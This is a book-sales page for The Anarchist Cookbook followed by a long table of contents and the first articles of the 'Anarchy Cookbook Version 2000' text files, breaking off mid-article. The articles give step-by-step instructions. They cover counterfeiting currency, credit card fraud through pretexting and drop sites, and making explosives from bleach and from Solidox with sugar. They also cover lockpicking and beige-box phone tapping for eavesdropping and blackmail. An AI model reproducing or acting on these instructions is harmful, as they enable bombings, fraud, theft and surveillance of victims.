The "Original' Anarchist Cookbook! (HOME)
NOT A CD OR A DOWNLOAD BUT THE ACTUAL PAPER BOOK!
BANNED IN 80 COUNTRIES
The Anarchist Cookbook by William Powell which contains instructions for
manufacturing explosives and telephone hacking devices was among the TOP TEN of
the ALA's list
of the 100 most banned books in the the world.
Eric Harris and Dylan Klebold, perpetrators of the 1999 Columbine High School
massacre, read and used the Anarchist Cookbook.
| Size | |
| Height: | 11.0 in. |
| Width: | 8.3 in. |
| Thickness: | 0.5 in. |
| Weight: | 16.0 oz. |
|
|
|
| Publisher's Note | |
| The classic which has sold more than 2 million copies. Now in its 41st printing. | |
While The Anarchist Cookbook is legally available in the United States, it is
illegal in many other countries. The information contained in the book includes
instructions that, if followed, may be against the law (see felony for more
details). Because of this, access to the book is often restricted, with some
bookstores refusing to sell the book to persons under 21 years of age. The book is treated more
as a set of guidelines, or a book of ideas, than an instruction manual for
terrorists, though it has been accused of promoting violence. Part of this book
has a section on martial arts and unarmed street fighting.
The Anarchist Cookbook (ISBN 0-9623032-0-8) is a book written by William Powell.
It was published in 1970 and was intended as a protest against the United States
government over the Vietnam war. The book contains recipes and instructions for
the manufacture of explosives, drugs, a number of now-obsolete
telecommunications hacking devices, and other controversial themes. Despite the
name, the book has no connection to the anarchist movement and is in fact
heavily criticized by most anarchists
The author has disowned it and, though the copyright having been
registered in the name of his publisher, he does not receive royalties from it.
Item for sale for $35.00 postage paid delivered anywhere in the world! CLICK ----->
Below are some 100 pages of files produced by pail imitators of the Anarchist Cookbook for sale above. Feel free to peruse the information, brought to you by the Dark Paladin Underground Bookseller. Please note that disclaimer applies
DO NOT USE THIS INFO FOR ANY ILLEGAL
ACTIVITIES OR YOU MAY GO TO JAIL.
ANARCHY COOKBOOK VERSION 2000
Table of Contents
1. Counterfeiting Money
2. Credit Card Fraud
3. Making Plastic Explosives
4. Picking Master Locks
5. The Arts of Lockpicking I
6. The Arts of Lockpicking II
7. Solidox Bombs
8. High Tech Revenge: The Beigebox
9. CO² Bombs
10. Thermite II Bombs
11. Touch Explosives
12. Letter Bombs
13. Paint Bombs
14. Ways to send a car to HELL
15. Do you hate school?
16. Phone related vandalism
17. Highway police radar jamming
18. Smoke Bombs
19. Mail Box Bombs
20. Hot-wiring cars
21. Napalm
22. Fertilizer Bomb
23. Tennis Ball Bomb
24. Diskette Bombs
25. Unlisted Phone Numbers
26. Fuses
27. How to make Potassium Nitrate
28. Exploding Lightbulbs
29. Under water igniters
30. Home-brew blast cannon
31. Chemical Equivalency List
32. Phone Taps
33. Landmines
34. A different Molitov Cocktail
35. Phone Systems Tutorial I
36. Phone Systems Tutorial II
37. Basic Alliance Teleconferencing
38. Aqua Box Plans
39. Hindenberg Bomb
40. How to Kill Someone
41. Phone Systems Tutorial III
42. Black Box Plans
43. The Blotto Box
44. Blowgun
45. Brown Box Plans
46. Calcium Carbide Bomb
47. More Ways to Send a Car to Hell
48. Ripping off Change Machines
49. Clear Box Plans
50. CNA Number Listing
51. Electronic Terrorism
52. Start a Conf. w/o 2600hz or MF
53. Dynamite
54. Auto Exhaust Flame Thrower
55. How to Break into BBs Express
56. Firebomb
57. Fuse Bomb
58. Generic Bomb
59. Green Box Plans
60. Portable Grenade Launcher
61. Basic Hacking Tutorial I
62. Basic Hacking Tutorial II
63. Hacking DEC's
64. Harmless Bombs
65. Breaking into Houses
66. Hypnotism
67. Remote Informer Issue #1
68. Jackpotting ATM Machines
69. Jug Bomb
70. Fun at K-Mart
71. Mace Substitute
72. How to Grow Marijuana
73. Match Head Bomb
74. Terrorizing McDonalds
75. "Mentor's" Last Words
76. The Myth of the 2600hz Detector
77. Blue Box Plans
78. Napalm II
79. Nitroglycerin Recipe
80. Operation: Fuckup
81. Stealing Calls from Payphones
82. Pool Fun
83. Free Postage
84. Unstable Explosives
85. Weird Drugs
86. The Art of Carding
87. Recognizing Credit Cards
88. How to Get a New Identity
89. Remote Informer Issue #2
90. Remote Informer Issue #3
91. Remote Informer Issue #4
92. Remote Informer Issue #5
93. Phreaker's Guide to Loop Lines
94. Ma-Bell Tutorial
95. Getting Money out of Pay Phones
96. Computer-based PBX
97. PC-Pursuit Port Statistics
98. Pearl Box Plans
99. The Phreak File
100. Red Box Plans
101. RemObS
102. Scarlet Box Plans
103. Silver Box Plans
104. Bell Trashing
105. Canadian WATS Phonebook
106. Hacking TRW
107. Hacking VAX & UNIX
108. Verification Circuits
109. White Box Plans
110. The BLAST Box
111. Dealing with the R&R Operator
112. Cellular Phone Phreaking
113. Cheesebox Plans
114. Start Your Own Conferences
115. Gold Box Plans
116. The History of ESS
117. The Lunch Box
118. Olive Box Plans
119. The Tron Box
120. More TRW Info
121. "Phreaker's Phunhouse"
122. Phrack Magazine-Vol. 3, Issue 27
123. Phrack Magazine-Vol. 3, Issue 27
124. Phrack Magazine-Vol. 3, Issue 28
125. Phrack Magazine-Vol. 3, Issue 28
126. Phrack Magazine-Vol. 3, Issue 28
127. Phrack Magazine-Vol. 3, Issue 30
128. Phrack Magazine-Vol. 3, Issue 30
129. Phrack Magazine-Vol. 3, Issue 30
130. Sodium Chlorate
131. Mercury Fulminate
132. Improvised Black Powder
133. Nitric Acid
134. Dust Bomb Instructions
135. Carbon-Tet Explosive
136. Making Picric Acid from Aspirin
137. Reclamation of RDX from C-4
138. Egg-based Gelled Flame Fuels
139. Clothespin Switch
140. Flexible Plate Switch
141. Low Signature System [Silencers]
142. Delay Igniter From Cigarette
143. Nicotine
144. Dried Seed Timer
145. Nail Grenade
146. Bell Glossary
147. Phone Dial Locks -- Beat'em
148. Exchange Scanning
149. A Short History of Phreaking
150. "Secrets of the Little Blue Box"
151. The History of British Phreaking
152. "Bad as Shit"
153. Telenet
154. Fucking with the Operator
155. Phrack Magazine-Vol. 1, Issue 1
156. International Country Codes List
157. Infinity Transmitter Plans
158. LSD
159. Bananas
160. Yummy Marihuana Recipes
161. Peanuts
162. Chemical Fire Bottle
163. Igniter from Book Matches
164. "Red or White Powder" Propellant
165. Pipe Hand Grenade
166. European Credit Card Fraud
167. Potassium Bomb
168. Your Legal Rights
169. Juvenile Offenders' Rights
170. Down The Road Missle
171. Fun With Shotgun Shells
172. Surveillance Equipment
173. Drip Timer
174. Stealing
175. Miscellaneous
176. Shaving cream bomb
177. Ripping off change machines II
178. Lockpicking the EASY way
179. Anarchy 'N' Explosives Prelude
180. Anarchy 'N' Explosives Vol. 1
181. Anarchy 'N' Explosives Vol. 2
182. Anarchy 'N' Explosives Vol. 3
183. Anarchy 'N' Explosives Vol. 4
184. Anarchy 'N' Explosives Vol. 5
185. Explosives and Propellants
186. Lockpicking III
187. Chemical Equivalent List II
188. Nitroglycerin II
189. Cellulose Nitrate
190. Starter Explosives
191. Flash Powder
192. Exploding Pens
193. Revised Pipe Bombs
194. * SAFETY * A MUST READ!
195. Ammonium TriIodide
196. Sulfuric Acid & Amm. Nitrate III
197. Black Powder III
198. Nitrocellulose
199. RDX
200. The Black Gate BBS
201. ANFOS
202. Picric Acid II
203. Bottled Explosives
204. Dry Ice
205. Fuses / Ignitors / Delays
206. Film Canister Bombs
207. Book Bombs
208. Phone Bombs
209. Special Ammunition
210. Rocketry
211. Pipe Cannon II
212. Smoke Bombs
213. Firecrackers
214. Suppliers II
215. Lab-Raid Checklist
216. Misc Anarchy
217. Combo Locks II
218. Misc Anarchy II
219. Thermite IV
1. Counterfeiting Money by The Jolly Roger
Before reading this article, it would be a very good idea to get a book on photo
offset printing, for this is the method used in counterfeiting US currency. If
you are familiar with this method of printing,
counterfeiting should be a simple task for you.
Genuine currency is made by a process called "gravure", which involves etching a
metal block. Since etching a metal block is impossible to do by hand, photo
offset printing comes into the process.
Photo offset printing starts by making negatives of the currency with a camera,
and putting the negatives on a piece of masking material (usually orange in
color). The stripped negatives, commonly
called "flats", are then exposed to a lithographic plate with an arc light plate
maker. The burned plates are then developed with the proper developing chemical.
One at a time, these plates are wrapped
around the plate cylinder of the press.
The press to use should be an 11 by 14 offset, such as the AB Dick 360. Make 2
negatives of the portrait side of the bill, and 1 of the back side. After
developing them and letting them dry, take them
to a light table. Using opaque on one of the portrait sides, touch out all the
green, which is the seal and the serial numbers. The back side does not require
any retouching, because it is all
one color. Now, make sure all of the negatives are registered (lined up
correctly) on the flats. By the way, every time you need another serial number,
shoot 1 negative of the portrait side, cut out the
serial number, and remove the old serial number from the flat replacing it with
the new one.
Now you have all 3 flats, and each represents a different color: black, and 2
shades of green (the two shades of green are created by mixing inks). Now you
are ready to burn the plates. Take a
lithographic plate and etch three marks on it. These marks must be 2 and 9/16
inches apart, starting on one of the short edges. Do the same thing to 2 more
plates. Then, take 1 of the flats and place it
on the plate, exactly lining the short edge up with the edge of the plate. Burn
it, move it up to the next mark, and cover up the exposed area you have already
burned. Burn that, and do the same thing 2
more times, moving the flat up one more mark. Do the same process with the other
2 flats (each on a separate plate). Develop all three plates. You should now
have 4 images on each plate with an
equal space between each bill.
The paper you will need will not match exactly, but it will do for most
situations. The paper to use should have a 25% rag content. By the way, Disaperf
computer paper (invisible perforation) does the
job well. Take the paper and load it into the press. Be sure to set the air,
buckle, and paper thickness right. Start with the black plate (the plate without
the serial numbers). Wrap it around the cylinder
and load black ink in. Make sure you run more than you need because there will
be a lot of rejects. Then, while that is printing, mix the inks for the serial
numbers and the back side. You will need to
add some white and maybe yellow to the serial number ink. You also need to add
black to the back side. Experiment until you get it right. Now, clean the press
and print the other side. You will now
have a bill with no green seal or serial numbers. Print a few with one serial
number, make another and repeat. Keep doing this until you have as many
different numbers as you want. Then cut the bills
to the exact size with a paper cutter. You should have printed a large amount of
money by now, but there is still one problem; the paper is pure white. To dye
it, mix the following in a pan: 2 cups of hot
water, 4 tea bags, and about 16 to 20 drops of green food coloring (experiment
with this). Dip one of the bills in and compare it to a genuine US bill. Make
the necessary adjustments, and dye all the
bills. Also, it is a good idea to make them look used. For example, wrinkle
them, rub coffee grinds on them, etc.
As before mentioned, unless you are familiar with photo offset printing, most of
the information in this article will be fairly hard to understand. Along with
getting a book on photo offset printing, try to
see the movie "To Live and Die in LA". It is about a counterfeiter, and the
producer does a pretty good job of showing how to counterfeit. A good book on
the subject is "The Poor Man's James
Bond".
If all of this seems too complicated to you, there is one other method available
for counterfeiting: The Canon color laser copier. The Canon can replicate
ANYTHING in vibrant color, including US
currency. But, once again, the main problem in counterfeiting is the paper used.
So, experiment, and good luck!
2. Credit Card Fraud by The Jolly Roger
For most of you out there, money is hard to come by. Until now:
With the recent advent of plastic money (credit cards), it is easy to use
someone else's credit card to order the items you have always desired in life.
The stakes are high, but the payoff is worth it.
Step One: Getting the credit card information
First off, you must obtain the crucial item: someone's credit card number. The
best way to get credit card numbers is to take the blue carbons used in a credit
card transaction at your local department
store. These can usually be found in the garbage can next to the register, or
for the more daring, in the garbage dumpster behind the store. But, due to the
large amount of credit card fraud, many stores
have opted to use a carbonless transaction sheet, making things much more
difficult. This is where your phone comes in handy.
First, look up someone in the phone book, and obtain as much information as
possible about them. Then, during business hours, call in a very convincing
voice - "Hello, this is John Doe from the Visa
Credit Card Fraud Investigations Department. We have been informed that your
credit card may have been used for fraudulent purposes, so will you please read
off the numbers appearing on your
Visa card for verification." Of course, use your imagination! Believe it or not,
many people will fall for this ploy and give out their credit information.
Now, assuming that you have your victim's credit card number, you should be able
to decipher the information given.
Step Two: Recognizing information from carbon copies
Card example:
[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE
Explanation:
MM/Y1 is the date the card was issued, and MM/Y2 is the expiration date. The
American Express Gold Card has numbers XXXXXX XXXXXXXX XXXXXXXX, and is covered
for up to
$5000.00, even if the card holder is broke.
[Mastercard]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
JOE SHMOE
Explanation:
XXXX in the second row may be asked for during the ordering process. The first
date is when the card was new, and the second is when the card expires. The most
frequent number combination used
is 5424 1800 XXXX XXXX. There are many of these cards in circulation, but many
of these are on wanted lists, so check these first.
[Visa]
4XXX XXX(X) XXX(X) XXX(X)
MM/YY MM/YY*VISA
JOE SHMOE
Explanation:
Visa is the most abundant card, and is accepted almost everywhere. The "*VISA"
is sometimes replaced with "BWG", or followed with a special code. These codes
are as follows:
[1] MM/YY*VISA V - Preferred Card
[2] MM/YY*VISA CV - Classic Card
[3] MM/YY*VISA PV - Premier Card
Preferred Cards are backed with money, and are much safer to use. Classic Cards
are newer, harder to reproduce cards with decent backing. Premier Cards are
Classic Cards with Preferred
coverage. Common numbers are 4448 020 XXX XXX, 4254 5123 6000 XXXX, and 4254
5123 8500 XXXX. Any 4712 1250 XXXX XXXX cards are IBM Credit Union cards, and
are risky to
use, although they are usually covered for large purchases.
Step Three: Testing credit
You should now have a Visa, Mastercard, or American Express credit card number,
with the victim's address, zip code, and phone number. By the way, if you have
problems getting the address, most
phone companies offer the Address Tracking Service, which is a special number
you call that will give you an address from a
phone number, at a nominal charge. Now you need to check the balance of credit
on the credit card (to make sure you don't run out of money), and you must also
make sure that the card isn't stolen.
To do this you must obtain a phone number that businesses use to check out
credit cards during purchases. If you go to a department store, watch the
cashier when someone makes a credit card
purchase. He/she will usually call a phone number, give the credit information,
and then give what is called a "Merchant Number". These numbers are usually
written down on or around the register. It is
easy to either find these numbers and copy them, or to wait until they call one
in. Watch what they dial and wait for the 8 digit (usually) merchant number.
Once you call the number, in a calm voice,
read off the account number, merchant number, amount, and expiration date. The
credit bureau will tell you if it is OK, and will give you an authorization
number. Pretend you are writing this number
down, and repeat it back to them to check it. Ignore this number completely, for
it serves no real purpose. However, once you do this, the bank removes dollars
equal to what you told them, because
the card was supposedly used to make a purchase. Sometimes you can trick the
operator by telling her the customer changed his mind and decided not to charge
it. Of course, some will not allow this.
Remember at all times that you are supposed to be a store clerk calling to check
out the card for a purchase. Act like you are talking with a customer when
he/she "cancels".
Step Four: The drop
Once the cards are cleared, you must find a place to have the package sent.
NEVER use a drop more than once. The following are typical drop sites:
[1] An empty house
An empty house makes an excellent place to send things. Send the package UPS,
and leave a note on the door saying, "UPS. I work days, 8 to 6. Could you please
leave the package on the back
door step?" You can find dozens of houses from a real estate agent by telling
them you want to look around for a house. Ask for a list of twenty houses for
sale, and tell them you will check out the
area. Do so, until you find one that suits your needs.
[2] Rent A Spot
U-Haul sometimes rents spaces where you can have packages sent and signed for.
End your space when the package arrives.
[3] People's houses
Find someone you do not know, and have the package sent there. Call ahead saying
that "I called the store and they sent the package to the wrong address. It was
already sent, but can you keep it
there for me?" This is a very reliable way if you keep calm when talking to the
people.
Do NOT try post office boxes. Most of the time, UPS will not deliver to a post
office box, and many people have been caught in the past attempting to use a
post office box. Also, when you have
determined a drop site, keep an eye on it for suspicious characters and cars
that have not been there before.
Step Five: Making the transaction
You should now have a reliable credit card number with all the necessary billing
information, and a good drop site.
The best place to order from is catalogues, and mail order houses. It is in your
best interest to place the phone call from a pay phone, especially if it is a
1-800 number. Now, when you call, don't try to
disguise your voice, thinking you will trick the salesperson into believing you
are an adult. These folks are trained to detect this, so your best bet is to
order in your own voice. They will ask for the
following: name, name as it appears on card, phone number, billing address,
expiration date, method of shipping, and product. Ask if they offer UPS Red
shipping (next day arrival), because it gives
them less time to research an order. If you are using American Express, you
might have a bit of a problem shipping to an address other than the billing
address. Also, if the salesperson starts to ask
questions, do NOT hang up. Simply talk your way out of the situation, so you
won't encourage investigation on the order.
If everything goes right, you should have the product, free of charge. Insurance
picks up the tab, and no one is any wiser. Be careful, and try not to order
anything over $500. In some states, UPS
requires a signature for anything over $200, not to mention that anything over
$200 is defined as grand theft, as well as credit fraud. Get caught doing this,
and you will bite it for a couple of years.
Good luck!
3. Making Plastic Explosives from Bleach by The Jolly Roger
Potassium chlorate is an extremely volatile explosive compound, and has been
used in the past as the main explosive filler in grenades, land mines, and
mortar rounds by such countries as France and
Germany. Common household bleach contains a small amount of potassium chlorate,
which can be extracted by the procedure that follows.
First off, you must obtain:
1. A heat source (hot plate, stove, etc.)
2. A hydrometer, or battery hydrometer
3. A large Pyrex, or enameled steel container (to weigh chemicals)
4. Potassium chloride(sold as a salt substitute at health and nutrition stores)
Take one gallon of bleach, place it in the container, and begin heating it.
While this solution heats, weigh out 63 grams of potassium chloride and add this
to the bleach being heated. Constantly check
the solution being heated with the hydrometer, and boil until you get a reading
of 1.3. If using a battery hydrometer, boil until you read a FULL charge.
Take the solution and allow it to cool in a refrigerator until it is between
room temperature and 0°C. Filter out the crystals that have formed and save
them. Boil this solution again and cool as before.
Filter and save the crystals.
Take the crystals that have been saved, and mix them with distilled water in the
following proportions: 56 grams per 100 milliliters distilled water. Heat this
solution until it boils and allow to cool. Filter
the solution and save the crystals that form upon cooling. This process of
purification is called "fractional crystallization". These crystals should be
relatively pure potassium chlorate.
Powder these to the consistency of face powder, and heat gently to drive off all
moisture.
Now, melt five parts Vaseline with five parts wax. Dissolve this in white
gasoline (camp stove gasoline), and pour this liquid on 90 parts potassium
chlorate (the powdered crystals from above) into a
plastic bowl. Knead this liquid into the potassium chlorate until intimately
mixed. Allow all gasoline to evaporate.
Finally, place this explosive into a cool, dry place. Avoid friction, sulfur,
sulfides, and phosphorous compounds. This explosive is best molded to the
desired shape and density of 1.3 grams in a cube
and dipped in wax until water proof. These block type charges guarantee the
highest detonation velocity. Also, a blasting cap of at least a 3 grade must be
used.
The presence of the afore mentioned compounds (sulfur, sulfides, etc.) results
in mixtures that are or can become highly sensitive and will possibly decompose
explosively while in storage. You should
never store homemade explosives, and you must use EXTREME caution at all times
while performing the processes in this
article.
You may obtain a catalog of other subject of this nature by writing:
Information Publishing Co.
Box 10042
Odessa, Texas 79762
4. Picking Master Locks by The Jolly Roger
Have you ever tried to impress someone by picking one of those Master
combination locks and failed?
The Master lock company made their older combination locks with a protection
scheme. If you pull the handle too hard, the knob will not turn. That was their
biggest mistake.
The first number:
Get out any of the Master locks so you know what is going on. While pulling on
the clasp (part that springs open when you get the combination right), turn the
knob to the left until it will not move any
more, and add five to the number you reach. You now have the first number of the
combination.
The second number:
Spin the dial around a couple of times, then go to the first number you got.
Turn the dial to the right, bypassing the first number once. When you have
bypassed the first number, start pulling on the clasp
and turning the knob. The knob will eventually fall into the groove and lock.
While in the groove, pull the clasp and turn the knob. If the knob is loose, go
to the next groove, if the knob is stiff, you have
the second number of the combination.
The third number:
After getting the second number, spin the dial, then enter the two numbers.
Slowly spin the dial to the right, and at each number, pull on the clasp. The
lock will eventually open if you did the process
right.
This method of opening Master locks only works on older models. Someone informed
Master of their mistake, and they employed a new mechanism that is foolproof
(for now).
5. The Arts of Lockpicking I by The Jolly Roger
Lockpicking I: Cars and assorted other locks
While the basic themes of lockpicking and uninvited entry have not changed much
in the last few years, some modern devices and techniques have appeared on the
scene.
Automobiles:
Many older automobiles can still be opened with a Slim Jim type of opener (these
and other auto locksmithing techniques are covered fully in the book "In the
Still of the Night", by John Russell III);
however, many car manufacturers have built cases over the lock mechanism, or
have moved the lock mechanism so the Slim Jim will not work. So:
American Locksmith Service
P.O. Box 26
Culver City, CA 90230
ALS offers a new and improved Slim Jim that is 30 inches long and 3/4 inches
wide, so it will both reach and slip through the new car lock covers (inside the
door). Price is $5.75 plus $2.00 postage
and handling.
Cars manufactured by General Motors have always been a bane to people who needed
to open them, because the sidebar locking unit they employ is very difficult to
pick. To further complicate
matters, the new GM cars employ metal shields to make the use of a Slim Jim type
instrument very difficult. So:
Lock Technology Corporation
685 Main St.
New Rochelle, NY 10801
LTC offers a cute little tool which will easily remove the lock cylinder without
harm to the vehicle, and will allow you to enter and/or start the vehicle. The
GMC-40 sells for $56.00 plus $2.00 for
postage and handling.
The best general automobile opening kit is probably a set of lockout tools
offered by:
Steck MFG Corporation
1319 W. Stewart St.
Dayton, OH 45408
For $29.95 one can purchase a complete set of six carbon lockout tools that will
open more than 95% of all the cars around.
Kwickset locks have become quite popular as one step security locks for many
types of buildings. They are a bit harder to pick and offer a higher degree of
security than a normal builder installed door
lock. So:
A MFG
1151 Wallace St.
Massilon, OH 44646
Price is $11.95. Kwickset locks can handily be disassembled and the door opened
without harm to either the lock or the door by using the above mentioned Kwick
Out tool.
If you are too lazy to pick auto locks:
Veehof Supply
Box 361
Storm Lake, IO 50588
VS sells tryout keys for most cars (tryout keys are used since there is no one
master key for any one make of car, but there are group type masters (a.k.a.
tryout keys). Prices average about $20.00 a
set.
Updated Lockpicking:
For years, there have been a number of pick attack procedures for most pin and
tumbler lock systems. In reverse order of ease they are as follows:
Normal Picking:
Using a pick set to align the pins, one by one, until the shear line is set and
the lock opens.
Racking:
This method uses picks that are constructed with a series of bumps, or diamond
shape notches. These picks are "raked" (i.e. run over all the pins at one time).
With luck, the pins will raise in the open
position and stay there. Raking, if successful, can be much less of an effort
than standard picking.
Lock Aid Gun:
This gun shaped device was invented a number of years ago and has found
application with many locksmiths and security personnel. Basically, a needle
shaped pick is inserted in the snout of the "gun",
and the "trigger" is pulled. This action snaps the pick up and down strongly. If
the tip is slipped under the pins, they will also be snapped up and down
strongly. With a bit of luck they will strike each
other and separate at the shear line for a split second. When this happens the
lock will open. The lock aid gun is not 100% successful, but when it does work,
the results are very dramatic. You can
sometimes open the lock with one snap of the trigger.
Vibrator:
Some crafty people have mounted a needle pick into an electric toothbrush power
unit. This vibrating effect will sometimes open pin tumbler locks -- instantly.
There is now another method to open pin and wafer locks in a very short time.
Although it resembles a toothbrush pick in appearance, it is actually an
electronic device. I am speaking of the Cobra pick
that is designed and sold by:
Fed Corporation
P.O. Box 569
Scottsdale, AR 85252
The Cobra uses two nine volt batteries, teflon bearings (for less noise), and a
cam roller. It comes with three picks (for different types of locks) and works
both in America and overseas, on pin or
wafer locks. The Cobra will open group one locks (common door locks) in three to
seven seconds with no damage, in the hands of an experienced locksmith. It can
take a few seconds more or up to a
half a minute for someone with no experience at all. It will also open group two
locks (including government, high security, and medicos), although this can take
a short time longer. It will not open GM
sidebar locks, although a device is about to be introduced to fill that gap. How
much for this toy that will open most locks in seven seconds?
$235.00 plus $4.00 shipping and handling.
For you hard core safe crackers, FC also sells the MI-6 that will open most
safes at a cost of $10,000 for the three wheel attack model, and $10,500 for the
four wheel model. It comes in a sturdy
aluminum carrying case with monitor, disk drive and software.
If none of these safe and sane ideas appeal to you, you can always fall back on
the magic thermal lance...
The thermal lance is a rather crude instrument constructed from 3/8 inch hollow
magnesium rods. Each tube comes in a 10 foot length, but can be cut down if
desired. Each one is threaded on one end.
To use the lance, you screw the tube together with a matted regulator (like a
welding outfit uses) and hook up an oxygen tank. Then oxygen is turned on and
the rod is lit with a standard welding igniter.
The device produces an incredible amount of heat. It is used for cutting up
concrete blocks or even rocks. An active lance will go through a foot of steel
in a few seconds. The lance is also known as a
burning bar, and is available from:
C.O.L. MFG
7748 W. Addison
Chicago, IL 60634
6. The Arts of Lockpicking II by The Jolly Roger
So you want to be a criminal. Well, if you want to be like James Bond and open a
lock in fifteen seconds, then go to Hollywood, because that is the only place
you are ever going to do it. Even
experienced locksmiths can spend five to ten minutes on a lock if they are
unlucky. If you are wanting extremely quick access, look elsewhere. The
following instructions will pertain mostly to the "lock
in knob" type lock, since it is the easiest to pick.
First of all, you need a pick set. If you know a locksmith, get him to make you
a set. This will be the best possible set for you to use. If you find a
locksmith unwilling to supply a set, don't give up hope.
It is possible to make your own, if you have access to a grinder (you can use a
file, but it takes forever).
The thing you need is an allen wrench set (very small). These should be small
enough to fit into the keyhole slot. Now, bend the long end of the allen wrench
at a slight angle (not 90°). Now, take your
pick to a grinder or a file, and smooth the end until it is rounded so it won't
hang inside the lock. Test your tool out on doorknobs at your house to see if it
will slide in and out smoothly. Now, this is
where the screwdriver comes in. It must be small enough for it and your pick to
be used in the same lock at the same time, one above the other. In the coming
instructions, please refer to this chart of
the interior of a lock:
______________________________
\ K
| | | | | | / E
| | | | \ Y [|] Upper tumbler pin
^ ^ / H [^] Lower tumbler pin
^ ^ ^ ^ ^ ^ \ O [-] Cylinder wall
/ L (This is a greatly simplified
\ E drawing)
______________________________/
The object is to press the pin up so that the space between the upper pin and
the lower pin is level with the cylinder wall. Now, if you push a pin up, it's
tendency is to fall back down, right? That is
where the screwdriver comes in. Insert the screwdriver into the slot and turn.
This tension will keep the "solved" pins from falling back down. Now, work from
the back of the lock to the front, and
when you are through, there will be a click, the screwdriver will turn freely,
and the door will open.
Do not get discouraged on your first try! It will probably take you about twenty
to thirty minutes your first time. After that, you will quickly improve with
practice.
7. Solidox Bombs by The Jolly Roger
Most people are not aware that a volatile, extremely explosive chemical can be
bought over the counter: Solidox.
Solidox comes in an aluminum can containing 6 grey sticks, and can be bought at
K-Mart, and various hardware supply shops for around $7.00. Solidox is used in
welding applications as an oxidizing
agent for the hot flame needed to melt metal. The most active ingredient in
Solidox is potassium chlorate, a filler used in many military applications in
the WWII era.
Since Solidox is literally what the name says: SOLID OXygen, you must have an
energy source for an explosion. The most common and readily available energy
source is common household sugar, or
sucrose. In theory, glucose would be the purest energy source, but it is hard to
find a solid supply of glucose.
Making the mixture:
1. Open the can of Solidox, and remove all 6 sticks. One by one, grind up each
of the sticks (preferably with a mortar and pestle) into the finest powder
possible.
2. The ratio for mixing the sugar with the Solidox is 1:1, so weigh the Solidox
powder, and grind up the equivalent amount of sugar.
3. Mix equivalent amounts of Solidox powder, and sugar in a 1:1 ratio.
It is just that simple! You now have an extremely powerful substance that can be
used in a variety of applications. A word of caution: be EXTREMELY careful in
the entire process. Avoid friction,
heat, and flame. A few years back, a teenager I knew blew 4 fingers off while
trying to make a pipe bomb with Solidox. You have been warned!
8. High Tech Revenge: The Beigebox - Rev.2 by The Jolly Roger
I. Introduction
Have you ever wanted a lineman's handset? Surely every phreak has at least once
considered the phun that he could have with one. After searching unlocked phone
company trucks for months, we had
an idea. We could build one. We did, and named it the "Beige Box" simply because
that is the color of ours.
The beigebox is simply a consumer lineman's handset, which is a phone that can
be attached to the outside of a person's house. To fabricate a beigebox, follow
along.
II. Construction and Use
The construction is very simple. First you must understand the concept of the
device. In a modular jack, there are four wires. These are red, green, yellow,
and black. For a single line telephone,
however, only two matter: the red (ring) and green (tip). The yellow and the
black are not necessary for this project. A lineman's handset has two clips on
it: the ring and the tip. Take a modular jack
and look at the bottom of it's casing. There should be a grey jack with four
wires (red, green, yellow & black) leading out of it. To the end of the red wire
attach a red alligator clip. To the end of the
green wire attach a green alligator clip. The yellow and black wires can be
removed, although I would only set them aside so that you can use the modular
jack in future projects. Now insert your
telephone's modular plug into the modular jack. That's it. This particular model
is nice because it is can be easily made, is inexpensive, uses common parts that
are readily available, is small, is
lightweight, and does not require the destruction of a phone.
III. Beige Box Uses
There are many uses for a Beige Box. However, before you can use it, you must
know how to attach it to the output device. This device can be of any of Bell
switching apparatus that include germinal
sets (i.e. remote switching centers, bridgin heads, cans, etc.) To open most
Bell Telephone switching apparatus, you must have a 7/16 inch hex driver (or a
good pair of needle nose pliers work also).
This piece of equipment can be picked up at your local hardware store. With your
hex driver (or pliers), turn the security bolt(s) approximately 1/8 of an inch
counter-clockwise and open. If your
output device is locked, then you must have some knowledge of destroying and/or
picking locks. However, we have never encountered a locked output device. Once
you have opened your output
device, you should see a mass of wires connected to terminals. On most output
devices, the terminals should be labeled "T" (Tip -- if not labeled, it is
usually on the left) and "R" (Ring -- if not labeled,
usually on the right).
Remember: Ring - red - right. The "Three R's" -- a simple way to remember which
is which. Now you must attach all the red alligator clip (Ring) to the "R"
(Ring) terminal. Attach the green alligator clip
(Tip) to the "T" (Tip) terminal.
Note: If instead of a dial tone you hear nothing, adjust the alligator clips so
that they are not touching each other terminals. Also make sure they are firmly
attached. By this time you should hear a dial
tone. Dial ANI to find out the number you are using (you wouldn't want to use
your own). Here are some practical applications:
· Eavesdropping
· Long distance, static free, free fone calls to phriends
· Dialing direct to Alliance Teleconferencing (also no static)
· Phucking people over
· Bothering the operator at little risk to yourself
· Blue Boxing with greatly reduced chance of getting caught
· Anything at all you want, since you are on an extension of that line
Eavesdropping
To be most effective, first attach the Beige Box then your phone. This
eliminates the static caused by connecting the box, therefore reducing the
potential suspicion of your victim. When eavesdropping,
it is always best to be neither seen nor heard. If you hear someone dialing out,
do not panic; but rather hang up, wait, and pick up the receiver again. The
person will either have hung up or tried to
complete their call again. If the latter is true, then listen in, and perhaps
you will find information worthy of blackmail! If you would like to know who you
are listening to, after dialing ANI, pull a CN/A
on the number.
Dialing Long Distance
This section is self explanatory, but don't forget to dial a "1" before the NPA.
Dialing Direct to Alliance Teleconferencing
Simply dial 0-700-456-1000 and you will get instructions from there. I prefer
this method over PBX's, since PBX's often have poor reception and are more
difficult to come by.
Phucking People Over
This is a very large topic of discussion. Just by using the other topics
described, you can create a large phone bill for the person (they will not have
to pay for it, but it will be a big hassle for them). In
addition, since you are an extension of the person's line, you can leave your
phone off the hook, and they will not be able to make or receive calls. This can
be extremely nasty because no one would
expect the cause of the problem.
Bothering the Operator
This is also self explanatory and can provide hours of entertainment. Simply ask
her things that are offensive or you would not like traced to your line. This
also corresponds to the previously described
section, Phucking People Over. After all, guess who's line it gets traced to?
Blue Boxing
See a file on Blue Boxing for more details. This is an especially nice feature
if you live in an ESS-equipped prefix, since the calls are, once again, not
traced to your line...
IV. POTENTIAL RISKS OF BEIGE BOXING
Overuse of the Beige Box may cause suspicions within the Gestapo, and result in
legal problems. Therefor, I would recommend you:
· Choose a secluded spot to do your Beige Boxing,
· Use more than one output device
· Keep a low profile (i.e., do not post under your real name on a public BBS
concerning your accomplishments)
In order to make sure the enemy has not been inside your output device, I
recommend you place a piece of transparent tape over the opening of your output
device. Therefor, if it is opened in your
absence, the tape will be displaced and you will be aware of the fact that
someone has intruded on your territory.
Now, imagine the possibilities: a $2000 dollar phone bill for that special
